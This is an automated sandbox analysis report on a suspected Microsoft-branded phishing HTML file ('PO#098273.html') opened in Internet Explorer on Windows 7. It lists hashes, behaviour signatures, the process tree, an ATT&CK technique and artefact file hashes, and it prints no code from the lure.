Overview

overview

5

Static

static

PO#098273.html

windows7_x64

5

PO#098273.html

windows10_x64

1

Analysis

  • max time kernel
    150s
  • max time network
    190s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    18-10-2021 16:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO#098273.html

  • Size

    3KB

  • MD5

    1f8ba9d2c06ce44c29fb3f67958d5bc5

  • SHA1

    d6063dad4bd7d9d270687efc564ea5b83d88155d

  • SHA256

    dd1aa00fd577744f0997758e64d2dbfa340da856a0ea5ded9935bd8a7953cb5a

  • SHA512

    1c4e59a6fb160cb7ee1bc277ccc53abc8ac4bc419828b3b27cf9677f5f7e19ff22d6ce59af09c3910b69312fc2e47c003ed9e6f02a868fbb3b0bcd61944e4d31

Score
5/10
microsoftphishing

Malware Config

Signatures

  • Detected potential entity reuse from brand microsoft.
    phishingmicrosoft
  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\PO#098273.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1080 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1632

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    MD5

    dfb0a8e57d235e5e50c0b83046662a0f

    SHA1

    47f0585da41d685471455d572b8f757ca0094e28

    SHA256

    ea8fbed9ae058f053779a3becfa6c5e6003d51e68918626cc9cbc51d3b875298

    SHA512

    a0ac1840bbadf8ccfacd8f6188d28392050a2e565ecad586a59a72fc7bcb542f6d3c1e84aeb2e0b53f18834723f54207bb57bb888373da9a759897d3ca0da314

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    ab5c36d10261c173c5896f3478cdc6b7

    SHA1

    87ac53810ad125663519e944bc87ded3979cbee4

    SHA256

    f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9

    SHA512

    e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    MD5

    644f9c9d54649b90fcf6326cfa1c9574

    SHA1

    eba61b01329e2ce55b9f881cc92f56ce1effe7b6

    SHA256

    95b299ac73562a6346f5c2136167bff2763e4a601080226dd2c5704de5e99990

    SHA512

    76c0870dc687b5e554556b9b14a6577bb8f53771f5cdcbe0fd6a0d8e575e27a59801fcef785e84ec24c7c22ab92e69ba30298a8acce6c60a62affd0ba85614de

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    2ad6acbb86561d29343bbad0aa9a15f7

    SHA1

    3940ad90a484ab1e0a979685a6f8e44668601b65

    SHA256

    e1fa4ce8cd112b57d5410dbb3103ab3247e07a53f727f1ef1e51b9e23471258c

    SHA512

    92db94677343be07bc41c8d0fb060aa1f89845f17df1fdb1306ec37cc4c4274bb07b583efca1246db4fe52e834a426e7d28889b9daeca5ce1f2272049d5844a5

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    5f46a5e55eabb0e709aa7780c654038a

    SHA1

    44deba1eeefe332581d1e40b5f4bbf08f3dc8b67

    SHA256

    12a3fa92684f2cd977224bc4feddd4a455dff41083902dcc386af020fc0e6b77

    SHA512

    19370399d7ed116221ecabda766a144997a4446a625404a3d494641b9cff64208c65d6511400cc13cfd0cec30897a140df0b91df76a92d251a3f61dce9c1f337

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    MD5

    3b6c5208481794cac52caa807fe4e308

    SHA1

    a311e869065fa5dcd9ef71082fc4061d06c25096

    SHA256

    07e332187fe8986c468415c68a095eacba1c19a46ea02acec661bdf8014c29fe

    SHA512

    13366a7b1cf1375ec582e48454e64623d9a1e0c743f6b36f822467188e8d131558186027f496897728b9121e36da24a821445d18237b45b71f79699a89d0f871

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\wkz58mr\imagestore.dat
    MD5

    da0e1f89d29d371798bb9b599638c426

    SHA1

    ec3fe65415de76c658aa2f384f044e8e5172171a

    SHA256

    ee3b480105bfd120d9afa5fb7dcf6452cd212bd5f63d6000c37999b2a6998663

    SHA512

    9b5f4b3bed4368cb69980875dc60e09ddc7f79391c46cb6b1fd953b582cde694f10684d4bf12caf92af616be400b1c28dae4dda50c41aa20d6cb4be4170ee58b

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IK9RBSXP.txt
    MD5

    594459b9434e69497863cf9c37ae6f47

    SHA1

    33f9ee295c099217810cd51c4038237400af5e80

    SHA256

    e60f041b41aa0fff3ec3cc59e6a03353966ac54928e85d194dfbd239297cea42

    SHA512

    8033a9046ae0172c5f51db1a9f1c2b7673f200c478d7ec5657b06036714903ccba3a5af2480757cb850b8131d9d9b38bb7696491cee2b906e143b5ba3f220c67

    Download Submit
  • memory/1080-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1632-54-0x0000000000000000-mapping.dmp
    Download